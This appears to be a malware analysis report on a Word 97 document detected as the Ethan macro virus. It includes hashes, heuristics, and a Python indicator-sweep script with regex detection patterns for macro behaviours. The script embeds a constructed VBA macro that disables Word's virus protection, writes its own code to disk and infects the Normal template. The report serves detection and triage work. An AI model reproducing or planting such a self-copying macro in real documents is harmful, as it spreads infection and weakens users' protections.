Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d25baace796c230…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 66.0 KB
Created: 2010-05-11 11:54:00
Authoring application: Microsoft Word 8.0
MD5: c3bcd4c12894757b41f5e721bb6fb079
SHA-1: 2324177dd53d32269f3d43d813bb6efee6cffb07
SHA-256: 0d25baace796c230503b547343b46cfa8a93bbad1fcc4cb7108d04dcdda31916
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy-format (OLE) Microsoft Word document containing VBA macros; ClamAV identifies it as Doc.Trojan.Ethan-20. The embedded VBA writes its own code out to 'c:\ethan.___' and modifies the Normal template, the global template Word loads in every session. An infected Normal template is the classic macro-virus persistence and spreading mechanism: the code is no longer tied to the lure document and can run again when the user opens or creates other documents. The document body presents a fake municipal contract to lure the user into enabling macros. Note that "Microsoft Word 8.0" is Word 97 and that the creation timestamp is OLE summary-information metadata, which is trivially forged, so neither should be used on its own for dating or attribution.
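The report records that olevba decoded the macro source; the sweep below shows the kind of behaviour triage an analyst runs over that decoded text, as an added example that is not code from the report, from oletools, or from the sample. The macro text in the block is a constructed illustration of a self-copying, Normal-template-infecting macro, not the Ethan-20 source, and the drop path and indicator weights are assumptions chosen for the example.

```python
"""Indicator sweep over decoded VBA carved from an OLE document.

Added example, not code from the report or from oletools. SAMPLE_VBA is a
CONSTRUCTED macro that mimics the behaviours the report describes (write own
code to disk, modify the Normal template); it is not the carved Ethan-20
source, and the drop path used in it is a placeholder.
"""
import re

# OLE2 / Compound File Binary signature that legacy .doc/.xls/.ppt files start with.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def is_ole_compound_file(data: bytes) -> bool:
    """True for an OLE container (legacy .doc); .docm/.docx are ZIP and start with 'PK'."""
    return data[:8] == OLE_MAGIC


# (tag, pattern, weight). Tags map onto the behaviours in the report: auto-execution
# on open, writing VBA to disk, touching the global Normal template, copying code via
# the VBE object model, and disabling the (Word 97-era) macro virus protection prompt.
# Weights are illustrative and are not the report's own risk scoring.
INDICATORS = [
    ("auto_exec", r"\b(AutoOpen|AutoClose|AutoExec|Document_Open|Document_Close)\b", 30),
    ("file_write", r"\bOpen\s+.+?\s+For\s+(Output|Append|Binary)\b", 25),
    ("normal_template", r"\bNormalTemplate\b", 30),
    ("vbproject_access", r"\b(VBProject|VBComponents|CodeModule)\b", 30),
    ("self_copy", r"\.(InsertLines|AddFromFile|AddFromString|Lines)\b", 20),
    ("virus_protection_off", r"\bVirusProtection\b", 25),
]
_COMPILED = [(tag, re.compile(rx, re.IGNORECASE), w) for tag, rx, w in INDICATORS]


def scan_vba(source: str) -> dict:
    """Return {tag: sorted unique matched snippets} for every indicator present."""
    hits = {}
    for tag, rx, _ in _COMPILED:
        found = {m.group(0) for m in rx.finditer(source)}
        if found:
            hits[tag] = sorted(found, key=str.lower)
    return hits


def score(hits: dict) -> int:
    """Capped additive score over the indicator tags that fired."""
    weights = {tag: w for tag, _, w in INDICATORS}
    return min(100, sum(weights[t] for t in hits))


def extract_paths(source: str) -> list:
    """Quoted Windows paths in the source, e.g. where the macro drops a copy of itself."""
    return sorted(set(re.findall(r'"([A-Za-z]:\\[^"]+)"', source)))


def triage(source: str) -> dict:
    """One-shot summary an analyst can diff against the AV verdict."""
    hits = scan_vba(source)
    return {"hits": hits, "score": score(hits), "paths": extract_paths(source)}


# Constructed sample, NOT the carved Ethan-20 source; "c:\drop.___" is a placeholder.
SAMPLE_VBA = r'''
Sub AutoOpen()
    On Error Resume Next
    Options.VirusProtection = False
    Set src = ActiveDocument.VBProject.VBComponents(1).CodeModule
    Open "c:\drop.___" For Output As #1
    Print #1, src.Lines(1, src.CountOfLines)
    Close #1
    Set dst = NormalTemplate.VBProject.VBComponents(1).CodeModule
    dst.AddFromFile "c:\drop.___"
End Sub
'''

# Constructed benign macro, for comparison: formatting only, no indicators.
BENIGN_VBA = r'''
Sub BoldHeadings()
    Dim p As Paragraph
    For Each p In ActiveDocument.Paragraphs
        If p.Style = "Heading 1" Then p.Range.Font.Bold = True
    Next p
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(name, triage(src))
```

Run it against the text olevba emits (for a real file, `olevba --decode sample.doc` prints the decoded modules) rather than the raw OLE stream: the VBA in the `Macros/VBA/*` streams is compressed, so pattern matching on the container bytes misses most of this.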

Heuristics (3)

  • [critical] CLAMAV_DETECTION: ClamAV: Doc.Trojan.Ethan-20
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20.
  • [critical] EXTRACTED_FILE_CLAMAV: ClamAV detection on extracted artifact
    ClamAV flagged at least one file extracted from inside this sample (here the decoded macro source, detected as Doc.Trojan.Ethan-1; the container and the carved source hit different signatures of the same family). Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator that the sample is a delivery vehicle.
  • [medium] OLE_VBA_MACROS: VBA macros detected
    The document contains VBA macro code.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: a2d70ac94361ce41829f2815f92d717b53b64d145708e724bf50b34acaa5361a
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6170 bytes
Detection: ClamAV: Doc.Trojan.Ethan-1
Obfuscation or payload: unlikely